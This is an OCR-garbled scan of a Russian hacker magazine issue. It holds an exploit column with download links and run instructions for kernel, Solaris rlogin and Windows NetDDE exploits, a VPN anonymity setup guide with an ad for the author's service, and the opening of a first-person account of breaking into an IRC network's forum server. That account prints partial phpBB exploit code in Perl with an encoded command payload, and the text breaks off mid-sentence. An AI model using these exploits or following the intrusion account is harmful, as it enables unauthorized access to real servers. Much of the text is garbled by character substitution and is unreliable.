рами был выпущен эксплойт для всех версий 
ядер 2.2, 2.4 и 2.6. Баг затаился в функции вы- 
деления памяти при подгрузке еІТ-библ потеки. 
Эксплойт выпущен под версией 1 .08 и работает 
нестабильно. Не удивляйся, если после запуска 
сплойта сервер перезагрузится или на экране 
высветится ошибка. Если эксплойт не сработал с 
первого раза, можно попробовать запустить его 
снова, а еще лучше наплодить два и более па- 
раллельных процесса (см. скриншот). 



защита: 



Уязвимыми считаются все версии ядер 2.2, 
2.4.29-ргеЗ и более ранние, а также все кернелы, 
включая 2.6.10. Делай выводы сам, какую версию 
ядра следует установить на твой сервер. Впро- 
чем, волноваться рано - пока еще не существует 
полнофункционального публичного эксплойта, 
повышающего привилегии на любом сервере. 



ссыпки: 



Забирай эксплойт по ссылке 
ѵѵш.$есигііу.ппоѵ.ги/(іІе$/еШЫ_ѵ108.с. Также рекомен- 
дую почитать форум на Шр://Ііпих.$Іа$іісІоІогд/агіі- 
сІе.рІ?$ісІ=05/01/07/2028203^гот=г$$, где обсуждает- 
ся данный баг. 



злоключение: 



Версия 1 .08 - только первый публичный релиз 
этого эксплойта. Думаю, через месяц мы 
увидим более мощный сплойт, который будет 
работать без сбоев. Хотя, скорее всего, такая 
версия уже существует, но держится в строгой 
секретности. 



СКЕЕТ8: 



Опять отличились польские хакеры с Іііір://і$ес.р1. 
На этот раз эксплойт был написан взломщиком 
РаиІ Зйггей (іЬадиег@ізес.рІ). 





80ЮВІ8 ВЮ6Ш 
ВІІЕЕЕВ ОІІЕВШШ 

описоние: 



Если ты помнишь, около двух лет назад я описы- 
вал эксплойт для ЗипОЗ. Он был нацелен на уяз- 
вимость в бинарнике /Ьіп/Іодіп. С помощью пе- 
реполнения буфера хакер мог получить рутовый 
шелл на всех версиях солярки. Не так давно ха- 
керами был найден еще один баг в /Ьіп/Іодіп. На 
этот раз он связан с неверной обработкой длин- 
ных переменных окружения. Вышедший 
эксплойт применяется для сервиса гіодіп, кото- 
рый часто встречается в ЗипОЗ. Для испытания 
сплойта необходимо иметь рутовые права на 
машине. Скомпилируй его с параметром -Іхпеі, 
а затем запускай с опцией -Ь ІР-адрес машины. 
Если сервис гіодіп принимает подключения со 
всех хостов, ты получишь сообщение о том, что 
стал рутам :). Я испытывал эксплойт на ЗипОЗ 
5.7, и он сработал с первого раза. 



защита: 



Для того чтобы защитить свою любимую систе- 
му, сливай патч с портала любителей ЗипОЗ 
(Мір://$ип$оІѵе.$ип.сот). После этого обязательно 
выруби службу гіодіп, заменив ее более надеж- 
ной (ззЬсІ, например). 



ссыаки: 



Скачивай эксплойт по ссылке 

ііѵііѵііѵ.$есигііуІаІ).ги/_ЕхрІоіі$/2004/12/5оІагі$_гІодіп.с.ІхІ. Про 

технические детали уязвимости читай тут: 

™.$есигіІуІаЬ.ги/27338.Іі1тІ. 



злоключение: 



Если верить словам багоискателя, то уязвимой 
является не только служба гіодіп, но и іпЛеІпеЙ, 
а также все сервисы, напрямую работающие с 
бинарником /Ьіп/Іодіп. Поэтому если на твоей 
солярке до сих пор крутится ІеІпеісІ, жди 
момента, когда твой сервер взломают. 



СНЕЕТ8: 



Эксплойт написан ребятами из команды Раріог, а 
именно лидером сообщества по имени Магсо Іѵаісіі. 
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описпние: 



1 5 декабря был выпущен эксплойт, позволяющий 
остановить работу Шпих-сервера. Если верить за- 
писям в багтраке, то уязвимость затаилась в 
функции ір_тас_5оигсе(), которая вызывается с 
помощью пользовательского АРІ. При кривом 
запросе существует возможность изменить зна- 
чение счетчика и зациклить функцию. После это- 
го вся память ядра, следующая за ктаііос-буфе- 
ром, сместится на 4 байта и система будет пере- 
загружена. 

Этот баг был найден при исследовании функций, 
обрабатывающих ІСМР-запросы. Помимо уязви- 
мости в і р тас зои гсе( ) , хакерами были найдены 
и другие бреши, однако выпущенный эксплойт 
уводит машину в даун именно таким способом. 



зпщитп: 



ІСМР-бреши были найдены в ядрах 2.4.28 и 2.6.9. 
Достаточно обновить кернел до более стабильных 
версий, и все хакеры пойдут лесом. Но не забывай 
читать ленты багтрака - проблема в 
ір_плас_5оигсе() может оказаться не единственной! 



ссыпки: 



Скачивай универсальный йоЗ’ер по ссылке 
т.5есигііуІаЬ.ги/_ЕхрІоіі$/2004/12Діпих_ідтр.с.Ы. Более 
подробная информация об ошибках 
реализации ІСМР-протокола находится здесь: 

ши.$есигііуІаЬ.ги/50495.ІіітІ. 



злоключение: 



Если какой-нибудь хакер проникнет на твой сер- 
вер и не сможет повысить права, он легко уро- 
нит машину даже через ША/Ѵ-браузер. Чтобы 
этого не произошло, обязательно обнови ядро 
твоего пингвина. 



6КЕЕТ8: 



Хакерское творение было написано небезызвест- 
ным польским хакером РаиІ Зіаггей 
(іЬадиег@ізес.рІ). 




Г 8ѴЗ СН0НПШ6ІИ 


л 


ишкевш 


1 


ОПИСПНИЕ: 



Всем известно, что для того, чтобы узнать в 
І_іпих пароль суперпользователя, необходимо 
прочитать файл /еІс/зЬасІоѵѵ. Однако только гооі 
обладает правами на чтение. Впрочем, в неко- 
торых системах содержимое /еІс/зЬасІоѵѵ можно 
увидеть, обладая группой гооі В таких ситуаци- 
ях хакеры могут применить недавно вышедший 
эксплойт зуз_сЬоѵѵп.с, который с легкостью ме- 
няет группу на определенном файле. Несмотря 
на то, что баг актуален только для 2.6 ядер, 
сплойт признается критическим. 

Для того чтобы проверить уязвимость, доста- 
точно скомпилировать эксплойт и запустить 
его с параметром путь к файлу. Если все сде- 
лано верно, на файл установится атрибут груп- 
пы пользователя, которой юзер обладает в 
данный момент. 



защита: 



Для защиты от уязвимости достаточно поставить 
патчик раІсИ-2.6.1 0, который заботливо выложен 
на ГСр.кегпеІ.огд. Второй способ защиты - откатить 
ядро до версии 2.4. Эта ветка является более 
стабильной и проверенной, чем 2.6. 



ссыаки: 



Чтобы проверить свою систему, скачивай 
эксплойт по ссылке 

шѵѵ.$есигіІу.ппоѵ.гиДіІе$/гаріог_с!іоѵѵп.с. Подробности 
бага не раскрываются, но поверхностное описа- 
ние ошибки можно найти здесь: 

шѵѵ.$есигіІу.ппоѵ.ги/$еагс!і/сІосипепІа$р?с1осіс1=6436. 



злоключение: 



Помимо чтения /еіс/зіпасіоѵѵ, хакер может полу- 
чить доступ к таким файлам, как /ѵаг/іод/ѵѵітр, 
/ѵаг/гип/иітр, /беѵ/тет, /сіеѵ/різ/* и т.п. Даже 
если взломщику не удастся прочитать /еіс/зіпасі- 
оѵѵ, он может прочитать любой участок памяти, 
почистить логи, а также пошпионить за другим 
пользователем через йу-файл. 



6НЕЕТ8: 



О многочисленных багах в ядре 2.6 нас оповести- 
ли разработчики ЗиЗе І_іпих. А коварный эксплойт 
был написан хакером Магсо Іѵаісіі (гар1ог@0хсіеасІ- 
ЬееТ.іпТо) из элитной команды Наріог. 




ШЙЙЕВШЕЙ ОІѴЕН- ^ 

иоиііпшйпвіитѵрос 

описпние: 



Служба сетевого ЭРЕ предназначена для дина- 
мического обмена данными между программа- 
ми, запущенными на одном или нескольких 
компьютерах. По умолчанию этот сервис отклю- 
чен, но многие пользователи юзают эту службу. 
А зря. Две недели назад был написан эксплойт, 
получающий права 5У5ТЕМ на удаленной маши- 
не. Уязвимыми считаются системы ѴѴіпІМТ, 
ѴѴіпХР+ЗРІ, ѴѴіп2к+5Р4 и ѴѴіп2003. Стандарт- 
ный суповой набор :). 

Для эксплуатирования бага достаточно запус- 
тить эксплойт с параметрами Ьозіпате, пеШіоз 
пате, Іагде* и Ьіпфоіі (по умолчанию 6666). Ес- 
ли на сервере установлен файрвол, можно ис- 
пользовать функцию соппЬаск, добавив еще 
один параметр в виде своего ІР-адреса. Перед 
запуском необходимо запустить на своей маши- 
не пеіса* с параметрами -I -р Ьіпфоіі. 



защита: 



Список обновлений, которые предлагает 
скачать МісгозоЙ, можно увидеть тут: ѵѵѵѵѵѵ.зеси- 
гііуІаЬ.ги/48599.МтІ. Если ты в принципе не 
используешь МеШРЕ, то можешь особо не 
напрягаться :). 



ссыаки: 



Скачать эксплойт можно по адресу ѵѵѵѵѵѵ.зесигііу- 
ІаЬ.ги/51725.ііітІ. Программа для сканирования 
наличия №ШОЕ находится тут: 

іііф://$кі(1е$.паго(].ги/ехрІоіі$/$сап.ехе. Самые ленивые 
могут скачать уже откомпилированный сплойт 
по ссылке ііі!р://1)аск.9су.сот/пеі{](]е_ехрІ. 



злоключение: 



Как всегда, неуязвимой является ѴѴіпХР+5Р2. 
Это заставляет лишний раз задуматься о по- 
лезности второго сервис-пака. Если ты еще не 
поставил его на свою машину, обязательно 
сделай это - избавишь себя от геморроя из-за 
лишнего обновления системы. 



6НЕЕТ8: 



Эксплойт написан хакером-одиночкой с ником 
ЬоизеоІсіаЬиз. Скажем ему за это большое спасибо 
и подарим ящик пива ;). 




Нестабильность службы №ШРЕ 



















взпом 



спи ты следишь за собственной безопасностью, то знаешь, каких усилий это депо требует. Соксы любят падать, прокси ториозпт, 
а пакеты в самопальных ззГтуннепях куда-то пропадают. Пора исправлять ситуацию, мой друг. Доверься грамотно настроенному ИРМ- 
серверу, и твоя анонимность будет на высоте. 



ПОПНЯТИЕ БЕ30П0СН0Г0 ТУННЕЛЯ 



аш постоянный читатель знает, 
что на страницах журнала уже 
описывалась теория по ѴРМ, ус- 
тановка нужных программ и т.п. 
Но пока еще не было статьи, ко- 
торая бы в полной мере описала 
настройку сервиса для хакера. То 
есть приложения, не ведущего 
логов, работающего максимально быстро и ка- 
чественно. Таких программ немного, но они 
есть. И ничто не мешает тебе поставить соф- 
тину на доверенный шелл и наслаждаться пре- 
лестями виртуального канала. 

Л КОКИЕ БЫВОЮТ ДЕИОНЫ? 

Рассмотрим популярные ипіх-демоны, кото- 
рые вполне можно использовать в качестве 
управляющего ѴРІ\І-приложения. Пока я дам 
их краткую характеристику, чтобы ты понял, 
что к чему. Затем рассмотрю правильную ус- 
тановку каждого сервиса в отдельности. 

О Роріор. Проект написан несколько лет назад 
и применяется повсеместно. Особенностью 
Роріор является то, что адаптирован он только 
под І_іпих. Некоторые умные личности успешно 
портируют поптоп под РгееВЗО, но простому 
смертному реализовать подобное будет сложно. 
О Мрб. Софтина, напротив, адаптирована 
исключительно под РгееВЗО, поскольку ис- 




пользует ядерные модули этой операционной 
системы. По возможностям Мрб схож с 
Роріор - здесь и реализация сжатия трафика, 
и шифрование майкрософтовским алгорит- 
мом. Ну и, конечно же, многопоточность 
и гибкая авторизация. 



Ѳ ОрепѴР[\І. Этот демон, в отличие от выше- 
описанных, имеет собственный алгоритм 
шифрования, базируется на стороннем спосо- 
бе сжатия информации и, как следствие, не- 
совместим со стандартным виндовым клиен- 
том. Но это, пожалуй, единственный минус 
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ІІРІШ-ШЕРСКИ 




ОрепѴРМ. В остальном он на голову выше сво- 
их конкурентов. Это ты поймешь, прочитав 
статью до конца. 

В зависимости от операционки, которая стоит 
на сервере, ты сможешь обладать как мини- 
мум двумя ѴРМ -сервисами. Ведь каждый чело- 
век в нашей стране имеет право на выбор :). 
Сегодня мы будем ставить два демона из это- 
го списка. О том, как установить РОРТОР, 
можно прочитать в 1 1 номере за 2003 год. 

^ПОДНИМПЕНМРО 

Начнем с демона со звучным названием МРЭ. 
Как я уже отметил, он применим только во 
РгееВЗЭ и полностью совместим с клиентами 
в ѴѴІП98/МТ/ХР. 

Я надеюсь, что у тебя обновленные порты, так 
как я опишу установку трб именно оттуда. За- 
ходи в /изг/рогІз/пеѴтрсІ и командуй таке. За- 
тем, когда модуль скачается и будет готов к 
установке, пиши «таке іпзіаіі», и ты получишь 
полноценное работающее приложение. Но, как 
говорится, сборка и настройка - это не одно и 
то же. Поэтому самое время приступить к сос- 
тавлению конфига приложения. 

Вообще, трб - многофункциональное роіпМо- 
роіпі приложение. Оно может использоваться 
в качестве как сервера, так и клиента. При 
этом трб поддерживает работу с РРРоЕ, 

РРТР, А051_ и обычным модемным соединени- 
ем. Из этого списка нас интересует только 
ррір, так давай же поскорее поднимем подде- 
ржку этого протокола. 

После инсталляции в каталоге 
/изг/іосаі/еіс/трсі появятся четыре файла. Это 
трсІ.сопТ, трсі.ііпкз, трсі.зесгеі и трб.зсгірі. 
Начнем с настройки главного конфига 
трб.сопЕ Наша задача - сделать его макси- 
мально совместимым со стандартами МісгозоЙ. 
Конфиг демона состоит из нескольких секций. 



Самая первая называется сІеТаиІІ;. Она в любом 
случае обрабатывается при старте сервиса. В 
этой вкладке принято делать ссылки на загруз- 
ку других нижележащих секций. В нашем слу- 
чае вкладка, обрабатываемая для каждого кли- 
ента, будет называться сііепі, 
а индивидуальная конфигурация расположится 
в разделе ррІр<НОМЕР>. Таким образом, 
можно наваять примерно следующий конфиг: 



Рабочий консриг трб.сопТ 



беіаиіі: 

Іоаб ррірі 
Іоаб ррір2 
ррірі: 

пеѵѵ -і пдО ррірі ррірі 

$еі ірср гапдез 192.168.0.1/32 192.168.0.2/32 

Іоаб сііепі 

РР*р2: 

пеѵѵ -і пді ррір2 ррір2 

зеі ірср гапдез 192.168.0.1/32 192.168.0.3/32 

Іоасі сііепі 

сііепі: 

зеі ііасе сіізаЫе оп-бетапб 
зеі ііасе (ІізаЫе ргоху-агр 
зеі ііасе іЫе О 
зеі ііасе епаЫе ІсртззЛх 
зеі Ьипсііе (ІізаЫе тиШІіпк 
зеі Ііпк уез асісотр ргоіосотр 
зеі Ііпк по рар сііар 
зеі Ііпк епаЫе сііар 
зеі Ііпк кеер-аііѵе 10 60 
зеі ірср уез ѵртр 
зеі Ьипсііе епаЫе сотргеззіоп 
зеі сер уез тррс 
зеі сер уез трр-е40 
зеі сер уез трр-е128 
зеі сер уез трр-зіаіеіезз 
зеі Ііпк тіи 1400 
зеі ііасе тіи 1400 



Расшифровывать каждый параметр конфига 
я не буду - в конце концов, эта статья не для 
сисадмина, а для хакера :). Здесь можно руко- 
водствоваться принципом «работает, и ладно», 
так как этот конфиг действительно работоспо- 
собен. Если есть желание добавить еще одно- 
го клиента, следует расписать вкладку ррІрЗ с 
интерфейсом пд2 и его названием ррІрЗ. Ран- 
жиры ІР-адресов также следует указать уни- 
кальными. При этом необходимо помнить, что 
первый адрес - айпишник шлюза, а второй - 
сетевой адресок клиента. И никак не наоборот. 
Теперь можно переходить к обработке 
трсі.ііпкз. В этом конфиге устанавливается ад- 
рес, который будет слушать трб, а также не- 
которые другие параметры. Для вышеописан- 
ного трсі.сопі этот файл будет выглядеть сле- 
дующим образом: 



Файл трсі.ііпкз 



ррірі: 

зеі Ііпк іуре ррір 
зеі ррір зеІЛР-аМгезз 
зеі ррір епаЫе іпсотіпд 
зеі ррір ЫзаЫе огідіпаіе 

ррір2: 

зеі Ііпк іуре ррір 



Здесь необходимо указать внешний ІР-адрес 
сервера, к которому будут осуществляться 
ѴРЛ -подключения. 

Наконец, самое время для файла трсі.зесгеі. 
Здесь следует прописывать три параметра: 
Іодіп, раззѵѵогсі и ІР-адрес клиента. Если жела- 
ешь, чтобы айпишник присваивался автома- 
том, - вписывай две опции вместо трех. В на- 
шем случае трсі.зесгеі имеет следующий вид: 

сііепіі "раззѵѵогЫ" 192.168.0.2 
сІіепі2 м ра$$^огб2 м 192.168.0.3 

При таком раскладе каждому клиенту будет 
присвоен свой статический ІР-адрес. 

Л В ЧЕМ сипо, йот? 

Как ты понимаешь, с локальными ІР-адресами 
по интернету не побродить. Чтобы каждый 
клиент смог обращаться к любому ресурсу 
глобальной Сети, необходимо организовать 
ЛАТ, то есть сетевую трансляцию локального 



а Вот ссылки, ко- 
торые помогут тебе 
в освоении ѴРМ: 
аѵіші. ореппеі.ги 
а Шр://орепѵрп. 
зоигееіогде.пеі 
а ѵшѵѵ.ііпихрогіаі.ги 




а Для реализации 
М05-шифрования 
тебе понадобится 
перловый модуль 
Оідезі::М05. Ищи 
его на 

зеагсіі.срап.огд или 
на нашем диске. 
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Записи в таблице ірпаі 



СЕРВИС ЖДЕТ СВОИХ КЛИЕНТОВ 



На правах рекламы позволь рассказать тебе о существовании так называемых ѴРЫ-сервисов. Их ор- 
ганизаторы предоставляют доступ к ѴРІМ-серверам с анонимными ІР-адресами, которые меняются че- 
рез определенное время. Я сам являюсь хозяином такого сервиса и уже снабдил быстрым ѴРЫ’ом 
всю редакцию «Хакера» (Куттер не даст соврать :)). Так что если тебе нужен качественный доступ 
всего за $40 в месяц - пиши письмо, рассмотрим любые варианты. Постоянным читателям предостав- 
ляются скидки (в разумных пределах). 
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настройка клиентской части 



Процесс соединения с сервером ОрепѴРИ 



Чтобы поднять клиент 
ОрепѴРІМ, также придется 
немножко попотеть. В первую 
очередь, сливай вторую вер- 
сию виндового ОрепѴРІМ 
(И«р://катепзк.пе1.гиЛогЬ/ѵрп/о 
репѵрп-2.0_ЬеІа1 5-іпзіаІІ.ехе). 
Не брезгай беткой, так как в 
дальнейших релизах почему- 
то убрали возможность авто- 
ризации через файл :(. После 
того как в системе появится 
новый интерфейс, переноси 
сертификат сервера на клие- 
нтскую сторону, а затем сос- 
тавляй конфиг-файл. 

Пример конфа ты можешь 
найти на диске или по ссылке 
ИИр://катепзк.пеі.гиЛогЬ/1/х/ѵ 
рп/ѵѵіпѵрп.соггі. В этом конфе 
нужно лишь задать ІР-адрес 
сервера и изменить путь в 
директиве с<± Последний шаг 
- запуск орепѵрп.ехе. Этот 
бинарник находится в с:\рго- 



дгапл ЛІез\орепѵрп\Ьіп. Его 
следует запускать с двумя 
параметрами: --сопТід "путь к 
конфигу" и -гесіігесі-даіеѵѵау. 
Последняя опция изменит 
маршрутизацию таким обра- 
зом, чтобы весь трафик по- 
шел через ѴРІЧ. 

Если ты выходишь в инет че- 
рез ОРВЗ/РРР, у тебя может 
возникнуть проблема при до- 
бавлении маршрута (глюк в 
орепѵрп.ехе). Она решается 
ЬаІ-скриптом, который исп- 
равно добавляет все необхо- 
димые маршруты. Где его 
найти, ты уже знаешь. Но 
помни, что при использова- 
нии сценария необходимо на- 
личие в конфе директив 
гоиіе-ир и сіоѵѵп (по умолча- 
нию они закомментированы). 





В добрый путь! 



адреса во внешний. Это достигается при по- 
мощи встроенной программы ірпаТ Для 
трансляции клиентских адресов необходимо 
выполнить четыре шага. 

О Вписать в /еІс/ірпаГшІез следующие правила: 

тар !хр0 192.168.0.2/32 -> ВНЕШНИЙ_АДРЕС/32 
тар Гхр0 192.168.0.4/32 -> ВНЕШНИЙ_АДРЕС/32 

О Подгрузить модуль ірі.ко командой 
кісііоасі ірі.ко. 

Ѳ Включить форвард пакетов командой зузсІІ 
-ѵѵ пеГіпеГір.4огѵѵагсІіпд=1 . 

О Применить правила ірпаі: ірпаі Л 
/еІс/ірпаГгиІез. 

Если все сделано правильно, пакеты будут ус- 
пешно транслироваться. 

^ 30П9СК0ЕМ И НПСППЖДОЕИСЯ 

Теперь самое время проверить работу трб - 
не зря же мы все настраивали :). Запускай 
/изг/ІосаІ/зЬіп/трсІ и увидишь какие-то непо- 
нятные строки. Если в них нет ошибок, то 
можно нажимать с4гІ+с и перезапускать трб с 
параметром -Ь. Теперь сервис будет работать 
в режиме демона, и именно так его следует 
прописывать в загрузочных сценариях 
РгееВЗО. 

После этого создай новое ѴРМ -соединение с 
обязательным использованием шифрования и 
поддержкой дефолтного шлюза. Соединяйся и 
пробуй обратиться к какому-нибудь узлу. По- 
лучил ответ? Поздравляю! Это означает, что 
теперь твоя защита стала абсолютной :). Тебе 
не нужно прятаться за проксики и соксы, ведь 
у тебя уже есть маскирующий ІР-адрес. 

Лунное и нестпндпртное 
решение 

Помимо сервисов, совместимых с продуктами 
МісгозоЙ, существуют проекты, юзающие 
собственный протокол передачи данных. Один 
из таких представителей - ОрепѴРМ. Коренное 
отличие от других ѴРМ -демонов можно узреть 
в шифровании. Трафик криптуется с помощью 
ПЗА-ключей стойким 1024-битным алгорит- 
мом с возможностью увеличения до 2048 бит. 
Также есть поддержка сертификатов, как сер- 
верных, так и клиентских, и статических клю- 
чиков авторизации. Отлично продуман меха- 
низм сжатия данных - для этого используется 
внешняя библиотека Ію. Скорость передачи 
особенно актуальна для диалапщиков и люби- 
телей ОРРЗ, поэтому они в первую очередь 
оценят прелести ОрепѴРМ. А ты, в свою оче- 
редь, позаботишься о правильной установке 
проекта. Итак, поехали. 

Скачивай Ію с ѵѵѵѵѵѵ.оЬегііитег.сот/орепзоигсе/ 
І2о/боѵѵпІоаб/І2О-1.08.іаг.д2 и инсталлируй эту биб- 
лиотеку. Иначе у тебя не соберется ОрепѴРМ. 
Затем убедись, что на твоей машине стоит 
ОрепЗЗЬ - это также важно. Если все депенд- 
сы удовлетворены, скачивай с 
Шр://ргсІоѵѵпІоасІ$.$оигсе(огде.пеі/орепѵрп/орепѵрп- 
2 . 0 _гсиаг.д 2 сорцы демона и собирай проект. 
Самое сложное - определиться с методом ав- 
торизации пользователей. Я решил, что выда- 
вать каждому юзеру сертификат - занятие ге- 
морройное, поэтому ограничился парой 
« Іод і п : раззѵѵогсі » и доверительным сертифика- 
том сервера. Думаю, это решение тебе также 
подойдет. Я знаю один ѴРМ -сервис, админы 
которого выдают своим клиентам постоянные 
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ІІРІШ-ШЕРСКИ 




ключи безо всяких паролей. В принципе, это 
дело вкуса, и я не буду навязывать свое мне- 
ние. Но о настройке расскажу :). 

Переходи в каталог /изг/іосаі/еіс/орепѵрп и 
создавай папку ззі. Для упорядоченности. За- 
тем передвигайся в этот каталог и сгенерируй 
сертификат с приватным ключом. Это делает- 
ся такой командой: 

орепззі гед -посіез -пеѵѵ -х509 -кеуоиЕ ѵрп.кеу -оиі ѵрп.сгі 
-бауз 3650 

Теперь создаем параметры шифрования: 

орепззі сібрагат -оиі с!Іі1024.рет 1024 

При желании можно увеличить число бит до 
2048, если ты параноик :). После этих экзер- 
сисов убедись, что в каталоге ззі находятся 
два файла: сІІі1024.рет и ѵрп.сгі. Они нужны 
для правильной работы ѴРІМ. 

Теперь оттачивай файл орепѵрп.сопТ Как я 
уже сказал, я использую авторизацию по па- 
ролю, и мой конфиг выглядит так: 

орепѵрп.сопЕ с поддержкой авторизации по паролю 



ІосаІ 67.159.3.138 

ссі /и$г/ІосаіМс/орепѵрп 

рогі 31337 

ргоіо ибр 

беѵ іип 

са ззі/ѵрп.сгі 

(ІІі з$І/сІІі1024.рет 

ііз-зегѵег 

зегѵег 192.168.0.0 255.255.255.0 

сІіепІ-сопЛд-сІіг сссі 

гоиіе 192.168.0.0 255.255.255.252 

кеераііѵе 10 60 

сотр-Іго 

ѵегЬЗ 

и$егпате-а$-соттоп-пате 
аіМ-изег-разз-ѵегі^у зсгіріз/аиШ.рІ ѵіа-епѵ 
сІіепЕ-сегНіоІ-гедшгесІ 



Если ты внимательно всмотрелся в конфиг, то 
узрел путь к зсгіріз/аиііі.рі. Дело в том, что 
при парольной авторизации демон экспорти- 
рует переменные ІІЗЕВІМАМЕ и РАЗЗѴѴОРЮ, в 
которые помещает логин и пароль клиента. 
Перловый скрипт все это дело проверяет и 
сравнивает с эталонными значениями. По зна- 
чению возврата (0 или 1 ) демон определяет 
валидность аккаунта. Чтобы сэкономить мес- 
то, я не стал приводить исходник сценария - 
ищи его на диске или в каталоге Шр://катеп- 
зк.пеігиДогЬ/І/х/ѵрп. 

В целях безопасности я решил криптовать па- 
роли алгоритмом ІѴЮ5 (проверяющий скрипт 
также привязан к ІѴЮ5-базе). Поэтому убедись, 
что в твоей системе есть утилита тсІ5. Создать 
пароль лучше всего с помощью запроса есНо - 
п 'раззѵѵогсГ | тсІ5. Также можно воспользо- 
ваться сценарием абсі.рі, который добавляет 
нового юзера в базу /изг/іосаі/еіс/орепѵрп/разз- 
ѵѵогсі. Этот скрипт автоматизирует операцию по 
прописке ІР-адреса пользователя в каталог ссб. 
Посмотри его исходник - он лежит в том же ка- 
талоге, - и тебе станет ясен механизм добавле- 
ния новых клиентов. 

Не забудь добавить в файл /еІс/ірпаТгиІез ІР- 
адреса клиентов ОрепѴРІМ. Как это сделать, я 



уже говорил. Теперь, когда все готово, запус- 
кай ОрепѴРМ с параметром --сопТід 
"/изг/ІосаІ/еІс/орепѵрп.сопГ -баетоп, и демон 
начнет следить за новыми подключениями. 

Л ПШѴРШІ.ЕН8? 

Вот и весь захватывающий процесс установки 
ѴРМ-серверов. Несложно, правда? :) Но если 
ты впервые сидишь в ІІМХ-шелле, некоторые 
затруднения у тебя, конечно, возникнут. В этом 
случае не стесняйся посещать шѵѵ.доодіе.сот 
и писать мне письма - я обязательно помогу 
разрешить твою проблему. За определенную 
плату, конечно ;). ЗС 



ТІРвІТРІСИіЭ 



Хочешь увидеть свои советы в журнале? 
Присылай их на адрес 8кІуагоѵ@геаІ.хакер.ги. 
Ведущий рубрики Тір$&Тгіск$ Иван Скляров. 



л Не знаю, может, это и до меня знали и использова- 
ли. Но часто в интернет-салонах нельзя зайти даже на 
обычную дискету, доступен только ІЕ. Открыть диск А 
можно простым способом: пишешь в адресной строке 
ЛІе:///А:/ и смотришь содержимое дискеты. 

Зіпісіп 

іѵа$Іікіп@ѵ$шро.ги 
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Самые большие затруднения всегда вы- 
зывает проблема совместимости. Вот 
и трсі страдает некоторыми неразре- 
шенными багами. Один из них - потеря 
пакетов в ѴѴіпХР. Если ты замечаешь по- 
добное, попробуй применить специаль- 
ный гед-файл (ѵ™л 74 пеІти/ІіеІр/МТІІ.ВЕѲ) 
и трабла решится сама собой. Надо ска- 
зать, что трсі крайне неудобен для адми- 
нистрирования. После добавления/уда- 
ления аккаунтов приходится рестартить 
демон, что очень напрягает. Если убить 
сервис по девятому сигналу, то так прос- 
то его не запустить. Придется выполнить 
команду пдсіі Іізі и последовательно за- 
вершить работу всех виртуальных интер- 
фейсов (пдсЛ зНиІсІоѵѵп ііасе). 



■»— ■ ' -.І | |>| Т г н 

I 

Список открытых интерфейсов 
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П НС - очень занинатепьная штука. В последнее время стало модно вести разговоры о том, какой беспредел творят ІНС-операторы: напь- 
ются, как бегемоты, и давай налево и направо кіІІ’ы раздавать. Однажды, насмотревшись на похожие проделки администрации одной 
русскоязычной ІВС-сети Маі.пеіло), я решип уравнять шансы простых юзеров и великих админов, немного похулиганить. И вот что я 
скажу: весело попучипось :). 




ИСТОРИЯ НЕППВНЕГО ВЗПОМР СЕРВЕРП КРУПНОЙ ІВС-СЕТИ 

А КОК ВСЕ начиналось $рат .= 



есть часов вечера. Прос- 
матриваю свой ЖЖ, о чем- 
то болтаю вІВС. Неожи- 
данно в ІСО стучится мой 
хороший сетевой знакомый 
(назовем его Витек) и со- 
общает радостную новость 
о том, что только что поя- 
вился сплойтдля рМрВВ <= 2.0.10, позволя- 
ющий выполнять произвольные ипіх-коман- 
ды. Почитав в Сети про этот баг, я сделал 
для себя вывод, что грядет целая волна атак, 
поскольку уязвимый форум очень популярен 
в инете, а найденная ошибка довольно серь- 
езная. Не буду тебя загружать тем, как функ- 
ционирует этот эксплойт, а лишь приведу его 
порезанный код, чтобы ты мог понять, о чем 
именно идет речь: 




, %ЗВ%20%65%63%68%6Р%20%5Р%45%4Е%44%5Р | ; 
$раііі .= 

І &МдМідМ=%2527.%70%61%73%73%74%68%72%75%28 

%24%48%54%54%50%5Р%47%45%54%5Р%56%41%52 

%53%5В%72%75%73%68%50%29.%2527 | ; 

$зоскеІ = І0::8оскеі::ШЕТ->пеѵѵ( Ргоіо => "іер", РеегАМг => 

"Ззегѵ", РеегРогІ => "80") || сііе "[-] МЕСТ РАИЕ0\г\п"; 

ргіпі ЗзоскеЕ "6ЕТ$раИі НТТР/1Л\п"; 

ргіпі $$оскеі "Нозі: $зегѵ\п"; 

ргіпі Ззоскеі "Ассері: */*\п"; 

ргіпі $зоскеі "СоппесНоп: сІозе\п\п"; 

$оп = 0: 

йііе (Запзѵѵег = <$зоскеі>) { 

ІР (Запзѵѵег =~ / Л _ЕМР 7 ) { ехіЦ); } 

ІР ($оп == 1) { ргіпР " Запзѵѵег"; } 

ІР (Запзѵѵег =~ / Л _5ТАКТ 7 ) { $оп = 1; } 

} 

ргіпР "[-] ЕХРШІТ РАИЕ0\г\п";\ 



Порезанный сплойт для ріірВВ 



$раШ = $(1іг; 

$раШ .= 'ѵіеѵѵРоріс.ріір?!^; 

$раШ .= $Роріс; 

$раШ .= 

'&гизРі=%65%63%68%6Р%20%5Р%53%54%41%52%54% 

5Р%ЗВ%20'; 

$раШ .= $ст(1; 



Если тебе захочется разобраться с этой уяз- 
вимостью, то на нашем диске ты найдешь 
довольно подробные документы, описываю- 
щие суть проблемы. Но сейчас не об этом. 
Как только я разобрался, что к чему, у меня 
сразу зачесались руки и захотелось попро- 
бовать это оружие в действии. В качестве 
жертвы в моей голове сразу же возник фо- 
рум баІ.пеТ.ги. Я прекрасно помнил, что там 



к. 



установлен древний рІірВВ 2.0.6, и, зная 
раззвиздяйство админов, можно было с уве- 
ренностью сказать: багов там немерено. 

Я не стал заморачиваться и решил сходу 
попробовать сплойт в действии. Для этого 
я подключился к одному из поломанных 
мною ранее шеллов и запустил там перло- 
вый сплойт, который назвал баІпеТ.рІ: 

$ регі баіпеірі ѵѵѵѵѵѵ.сіаі.пеіги МаІпеЩошт/ 26 "Із" 

Здесь ѵѵѵѵѵѵ.сіаі.пеіги - это хост сервера, 
/сІаІпеТгиТогит/ - папка с форумом рІірВВ, 

26 - ісі существующего поста в форуме, "Із" - 
выполняемая консольная команда ипіх. 
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I Ьр 



Так выглядит листинг директорий форума 



Л чей это здесь воняет? 

Думаю, понятно, чем здесь пахнет: уже через 
несколько секунд после запуска сплойта у 
меня был полноценный ѵѵеЬ-шелл на сервере 
Далнета! Вообще, конечно, файловая систе- 
ма такого сервера - это лакомый кусочек! Я 
долго лазал по таким интересным папкам, 
как ігссі, зегѵісез-МиЬ, зегѵісез, (МгіЬ, Ьаскир 
и ш/ѵѵ, однако в тот момент меня более все- 
